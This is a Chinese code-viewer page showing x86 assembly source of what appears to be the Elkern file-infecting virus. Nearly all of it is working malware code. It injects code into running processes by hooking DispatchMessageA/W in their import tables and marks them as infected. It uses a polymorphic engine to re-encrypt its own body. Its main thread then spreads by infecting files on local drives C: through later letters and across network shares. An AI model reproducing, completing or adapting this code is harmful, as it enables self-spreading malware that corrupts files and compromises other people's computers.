📄 elkern.c源代码 .txt
字号:
lea esi,[ebp+inject_code-inf_proc_ip]
push esi
call blk_decrypt
pushad
mov ecx,[ebp+addrMapViewOfFile-inf_proc_ip]
mov [ebp+inject_code_mapviewoffile-inf_proc_ip],ecx
mov ecx,[ebp+addrOpenFileMappingA-inf_proc_ip]
mov [ebp+inject_code_openfilemapping-inf_proc_ip],ecx
call inf_proc_0
db FMAP_NAME
inf_proc_0:
pop edi
push edi
push large 0
push large FILE_MAP_WRITE
call ecx
or eax,eax
jz short inf_proc_not_mapped
push eax
call [ebp+addrCloseHandle-inf_proc_ip]
jmp short inf_proc_mapped
inf_proc_not_mapped:
mov eax,vir_mem_size
mov ecx,eax
SUBCALL create_mem_map,inf_proc_ip
jz short inf_proc_mapped
cld
mov edi,eax
xor eax,eax
stosd
mov eax,vir_size
stosd
lea esi,[ebp+_start-inf_proc_ip]
rep movsb
mov [ebp+quick_sleep-inf_proc_ip],esi ;Have quick sleep
inf_proc_mapped:
popad
mov [ebp+inf_proc_esp-inf_proc_ip],esp
SUBCALL virtual_protect,inf_proc_ip
jz inf_proc_ret
;edi ;Process handle
;ebx Process base address
;eax vbuffer address
push edi
push ebx
SUBCALL read_proc_mem,inf_proc_ip
cmp byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN ;Has been infected?
inf_proc_seh_restore_jmp:
jz inf_proc_seh_restore
mov byte ptr [eax+MEM_INF_POS],MEM_INF_SIGN
mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table
mov ebx,eax
SUBCALL check_pe,inf_proc_ip
jz short inf_proc_seh_restore_jmp
;eax->PE base
mov edi,[eax+28h]
SUBCALL get_section_of_rva,inf_proc_ip
or ecx,ecx
jz short inf_proc_seh_restore_jmp
mov edi,[edx+4]
mov [ebp+inf_proc_rva-inf_proc_ip],edi
mov edi,[edx]
mov ecx,[edx+8]
cmp edi,ecx
jna short inf_proc_3
xchg ecx,edi
inf_proc_3:
;Now edi is the small size,ecx is the big one
mov [ebp+inf_proc_code_size-inf_proc_ip],edi
sub ecx,edx
cmp ecx,inject_code_size
jc inf_proc_seh_restore
mov ecx,[eax+80h] ;Import directory
or ecx,ecx
jz short inf_proc_seh_restore_jmp
pop ebx
pop edi
push ebx
add ebx,ecx
push ecx
SUBCALL read_proc_mem,inf_proc_ip
push edx
SUBCALL get_rand,inf_proc_ip
movzx ecx,dl
and cl,3fh
pop edx
pop esi
mov ebx,eax
sub ebx,5*4
push ecx
inf_proc_101:
add ebx,5*4
mov ecx,[ebx+3*4]
jecxz inf_proc_102
push eax
sub ecx,esi
cmp ecx,INFPROC_MAP_SIZE
jnc short inf_proc_102
mov eax,[eax+ecx]
call eax_to_lowcase
cmp eax,'resu' ;user
pop eax
jnz short inf_proc_101
mov dword ptr [esp],1000h
mov eax,ebx
inf_proc_102:
pop ecx
mov ebx,[eax+4*4]
add ebx,[esp]
push ebx
SUBCALL virtual_protect,inf_proc_ip
jz inf_proc_seh_restore
SUBCALL read_proc_mem,inf_proc_ip ;read import table
mov esi,eax
cld
inf_proc_1:
lodsd
cmp eax,[ebp+addrDispatchMessageA-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
cmp eax,[ebp+addrDispatchMessageW-inf_proc_ip] ;First find DispatchMessageA/W
jz short inf_proc_1_5
or eax,eax
loopnz inf_proc_1
inf_proc_1_5:
sub esi,4
or eax,eax
jnz short inf_proc_2
sub esi,4
inf_proc_2:
mov eax,[esi]
mov [ebp+inject_code_raw_api-inf_proc_ip],eax
mov ebx,[esp+4]
add ebx,12345678h
inf_proc_rva equ $-4
add ebx,12345678h
inf_proc_code_size equ $-4
mov [esi],ebx
SUBCALL virtual_protect,inf_proc_ip
jz short inf_proc_seh_restore
lea eax,[ebp+inject_code-inf_proc_ip]
push large inject_code_size
pop ecx
SUBCALL write_proc_mem,inf_proc_ip ;Write inject code
jz short inf_proc_seh_restore
pop ebx
lea eax,[ebp+vbuffer-inf_proc_ip]
mov ecx,INFPROC_MAP_SIZE
SUBCALL write_proc_mem,inf_proc_ip ;Write import table
inf_proc_ret:
inf_proc_seh_restore:
mov esp,12345678h
inf_proc_esp equ $-4
SUBCALL get_rand,inf_proc_ip
pop esi
mov [esi-4],dx
call blk_encrypt
POP DWord Ptr FS:[0] ; restore except chain
pop esi
pop esi
popad
retn
inf_proc_seh:
call inf_proc_seh_ip
inf_proc_seh_ip:
pop eax
lea eax,[eax-(inf_proc_seh_ip-inf_proc_seh_restore)]
PUSH eax
MOV EAX,[ESP + 00Ch+4] ; context
POP DWord Ptr [EAX + 0B8h] ; context.eip = @ExceptProc
XOR EAX,EAX ; 0 = ExceptionContinueExecution
RET
inf_proc_end:
CALLHEADER enum_proc
enum_proc:
pushad
call enum_proc_ip
enum_proc_ip:
pop ebp
mov ecx,[ebp+addrCreateToolhelp32Snapshot-enum_proc_ip]
jecxz short enum_proc_0
SUBCALL snap_proc,enum_proc_ip
jmp short enum_proc_ret
enum_proc_0:
xor eax,eax
mov ecx,20000
enum_proc_1:
add eax,4
SUBCALL into_proc,snap_proc_ip
loop enum_proc_1
enum_proc_ret:
popad
retn
enum_proc_end:
;in--ebp->enum_proc_ip
CALLHEADER snap_proc
snap_proc:
snap_proc_ip equ enum_proc_ip
pushad
push large 0
push large 2 ;TH32CS_SNAPPROCESS
call [ebp+addrCreateToolhelp32Snapshot-snap_proc_ip]
or eax,eax
jz snap_proc_ret
push eax
lea edi,[ebp+snapbuf-snap_proc_ip]
mov dword ptr [edi],296 ;size
push edi
push eax
call [ebp+addrProcess32First-snap_proc_ip]
snap_proc_1:
or eax,eax
jz snap_proc_2
mov ecx,[ebp+is9x-snap_proc_ip]
jecxz snap_proc_3
push edi
lea ebx,[edi+9*4] ;->szExeFile
call snap_proc_4
db '\explorer',0
snap_proc_4:
pop edi
SUBCALL str_instr,snap_proc_ip
pop edi
jnz short snap_proc_5 ;If is Win9X,only explorer to infect
snap_proc_3:
mov eax,[edi+2*4] ;th32ProcessID
SUBCALL into_proc,snap_proc_ip
snap_proc_5:
pop eax
push eax
push edi
push eax
call [ebp+addrProcess32Next-snap_proc_ip]
jmp snap_proc_1
snap_proc_2:
call [ebp+addrCloseHandle-snap_proc_ip]
snap_proc_ret:
popad
retn
snap_proc_end:
;in--ebp->enum_proc_ip,eax=PID
CALLHEADER into_proc
into_proc:
into_proc_ip equ enum_proc_ip
pushad
push eax
push large 0
push large 0fffh
call [ebp+addrOpenProcess-into_proc_ip]
or eax,eax
jz short into_proc_2
push eax
xchg eax,edi
mov ebx,400000h
SUBCALL inf_proc,into_proc_ip
call [ebp+addrCloseHandle-enum_proc_ip]
into_proc_2:
popad
retn
into_proc_end:
;in--ebx->image base
;out--ZF not set,is valid PE,ZF set,invalid,eax->PE base
CALLHEADER check_pe
check_pe:
push ecx
xor ecx,ecx
cmp word ptr [ebx],'ZM'
jnz short check_pe_ret
mov eax,[ebx+3ch]
add eax,ebx
cmp word ptr [eax],'EP'
jnz short check_pe_ret
test byte ptr [eax+16h+1],20h ;Is a DLL?
jnz short check_pe_ret
push ebx
mov bl,[eax+5ch] ;Subsystem
and bl,0feh
cmp bl,2
pop ebx
jnz short check_pe_ret
inc ecx
check_pe_ret:
or ecx,ecx
pop ecx
retn
check_pe_end:
;Get the section of a RVA
;in--eax=PE base,edi=RVA to find
;out--edx->section header.VirtualSize,ecx=0 means not found
;if not found,edx=>last section header.VirtualSize
CALLHEADER get_section_of_rva
get_section_of_rva:
push ecx
movzx edx,word ptr [eax+14h]
lea edx,[eax+edx+18h+8-28h] ;->before first section header.VirtualSize
movzx ecx,word ptr [eax+6]
inc ecx
get_section_of_rva_1:
dec ecx
jecxz get_section_of_rva_2
add edx,28h ;->VirtualSize
mov esi,[edx+4]; esi=VirtualAddress
cmp edi,esi ;RVA<VirtualAddress?
jc short get_section_of_rva_1
add esi,[edx]; esi=VirtualAddress+VirtualSize
cmp esi,edi;VirtualAddress+VirtualSize<RVA
jna short get_section_of_rva_1
get_section_of_rva_2:
or ecx,ecx
pop ecx
retn
get_section_of_rva_end:
;Copy and encrypt vir body to infbuffer
CALLHEADER prepare_buffer
prepare_buffer:
pushad
call pre_buf_ip
pre_buf_ip:
pop ebp
SUBCALL poly_start,pre_buf_ip
SUBCALL poly_callsub,pre_buf_ip
SUBCALL poly_blk_encrypt,pre_buf_ip
SUBCALL poly_blk_encrypt_poly,pre_buf_ip
lea esi,[ebp+_start-pre_buf_ip]
lea edi,[ebp+infbuffer-pre_buf_ip]
mov ecx,vir_size
cld
push edi
rep movsb
SUBCALL get_rand,pre_buf_ip
pop edi
lea esi,[edi+prepare_buffer-_start]
mov word ptr [esi-4],dx
call blk_encrypt
xchg dh,dl
lea esi,[edi+main_thread-_start]
mov word ptr [esi-4],dx
call blk_encrypt
popad
retn
prepare_buffer_end:
CALLHEADER poly_callsub
poly_callsub:
pushad
call poly_callsub_ip
poly_callsub_ip:
pop ebp
SUBCALL get_rand,poly_callsub_ip
lea edi,[ebp+_callsub-poly_callsub_ip]
mov dword ptr [edi],000000e8h+(blk_encrypt-call_sub_1)*100h
mov dword ptr [edi+4],0fc76ff00h
test dl,1
jz short poly_callsub_1
mov dword ptr [edi],0e8fc76ffh
mov dword ptr [edi+4],00000000h+(blk_encrypt-call_sub_1-3)
poly_callsub_1:
mov dword ptr [edi+8],0fc46c766h
mov dword ptr [edi+8+4],0ff560000h
test dl,2
jz short poly_callsub_2
mov dword ptr [edi+8],046c76656h
mov dword ptr [edi+8+4],0ff0000fch
poly_callsub_2:
popad
retn
poly_callsub_end:
;in--edx=random
CALLHEADER poly_blk_encrypt
poly_blk_encrypt:
pushad
call poly_blk_encrypt_ip
poly_blk_encrypt_ip:
pop edi
add edi,blk_encrypt-poly_blk_encrypt_ip
test dl,1
jz short poly_blk_encrypt_1
poly_blk_encrypt_@1 equ $
mov bl,[edi]
xchg bl,[edi+1]
xchg bl,[edi]
poly_blk_encrypt_1:
poly_blk_encrypt_@2 equ $+1
mov bx,5f56h
mov word ptr [edi+2],bx
test dl,2
jz short poly_blk_encrypt_2
poly_blk_encrypt_@3 equ $+1
mov bx,0fe8bh
mov word ptr [edi+2],bx
poly_blk_encrypt_2:
mov dword ptr [edi+blk_encrypt_@1],0f59006ah
test dl,4
jz short poly_blk_encrypt_3
mov dword ptr [edi+blk_encrypt_@1],0f90c933h
poly_blk_encrypt_3:
poly_blk_encrypt_4:
popad
retn
poly_blk_encrypt_end:
;in--edi->offset poly_blk_encrypt
CALLHEADER poly_blk_encrypt_poly
poly_blk_encrypt_poly:
pushad
call poly_blk_encrypt_poly_ip
poly_blk_encrypt_poly_ip:
pop ebp
lea edi,[ebp+poly_blk_encrypt-poly_blk_encrypt_poly_ip]
mov esi,edi
call blk_decrypt
SUBCALL get_rand,poly_blk_encrypt_poly_ip
and dl,3h ;only take four common reg,eax,ebx,ecx,edx
mov al,dl
shl al,3
and byte ptr [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+1-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+3-poly_blk_encrypt],al
and byte ptr [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@1+6-poly_blk_encrypt],al
mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@2-poly_blk_encrypt],0f8h
or [edi+poly_blk_encrypt_@2-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@2+5-poly_blk_encrypt],al
SUBCALL get_rand,poly_blk_encrypt_poly_ip
mov al,dh
and al,3
and byte ptr [edi+poly_blk_encrypt_@3-poly_blk_encrypt],0f8h
or [edi+poly_blk_encrypt_@3-poly_blk_encrypt],al
shl al,3
and byte ptr [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],0c7h
or [edi+poly_blk_encrypt_@3+5-poly_blk_encrypt],al
mov esi,edi
call blk_encrypt
popad
retn
poly_blk_encrypt_poly_end:
CALLHEADER poly_start
poly_start:
pushad
call poly_start_ip
poly_start_ip:
pop ebp
SUBCALL get_rand,poly_start_ip
test dl,1
jz short poly_start_1
mov eax,[ebp+_start_@1-poly_start_ip]
xchg eax,[ebp+_start_@2-poly_start_ip]
xchg eax,[ebp+_start_@1-poly_start_ip]
poly_start_1:
lea esi,[ebp+_start_@3+1-poly_start_ip]
and dl,3
and byte ptr [esi+2],0f8h
or [esi+2],dl
shl dl,3
and byte ptr [esi],0c7h
or [esi],dl
and dh,018h
add esi,main_enter-_start_@3 ;esi->main_enter+1
and byte ptr [esi],0c7h
or [esi],dh
add esi,3
and byte ptr [esi],0c7h
or [esi],dh
rol edx,8
dec esi ;esi->main_enter
mov byte ptr [esi],89h
test dl,1
jz short poly_start_2
mov byte ptr [esi],87h
poly_start_2:
popad
retn
poly_start_end:
;*******************************infproc.asm end*****************************
;*******************************mainthrd.asm*****************************
;include mainthrd.asm
CALLHEADER main_thread
main_thread:
call main_thread_ip
main_thread_ip:
pop ebp
if DEBUG
OUTSTRING 'I go in'
endif
SUBCALL get_extra_proc,main_thread_ip
SUBCALL prepare_buffer,main_thread_ip
call [ebp+addrGetVersion-main_thread_ip]
shr eax,31 ;MSB=1 means is Win9X
mov [ebp+is9x-main_thread_ip],eax
sub esp,MAX_DIR_SIZE
cld
xor eax,eax
mov [ebp+goto_enum_proc_pretime-main_thread_ip],eax
mov [ebp+quick_sleep-main_thread_ip],eax
call [ebp+addrGetTickCount-main_thread_ip]
mov [ebp+have_a_sleep_pretime-main_thread_ip],eax
call goto_enum_proc
;Infect module path
mov edi,esp
push large MAX_DIR_SIZE
push edi
push large 0
call [ebp+addrGetModuleFileNameA-main_thread_ip]
call find_str_tail
std
mov cl,0ffh
mov al,'\'
repnz scasb
cld
mov byte ptr [edi+1],0
call enum_path
;Infect all driver
infect_all_driver:
SUBCALL get_rand,main_thread_ip
and dl,3
add dl,'c' ;first try C:~F:
mov [esp],dl
mov word ptr [esp+1],':'
push large ((INFECT_LASTDISK-INFECT_FIRSTDISK) and 0ffh)+1
pop ecx
infect_disk_loop:
mov edi,ecx
push esp
call [ebp+addrGetDriveTypeA-main_thread_ip]
cmp al,3
jc short next_disk
cmp al,4
ja short next_disk
call enum_path
next_disk:
mov al,[esp]
inc al
cmp al,INFECT_LASTDISK and 0ffh
jbe short next_disk_1
mov al,INFECT_FIRSTDISK and 0ffh
next_disk_1:
mov [esp],al
mov ecx,edi
loop infect_disk_loop
;Infect through net
infect_net:
xor eax,eax
call enum_net
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -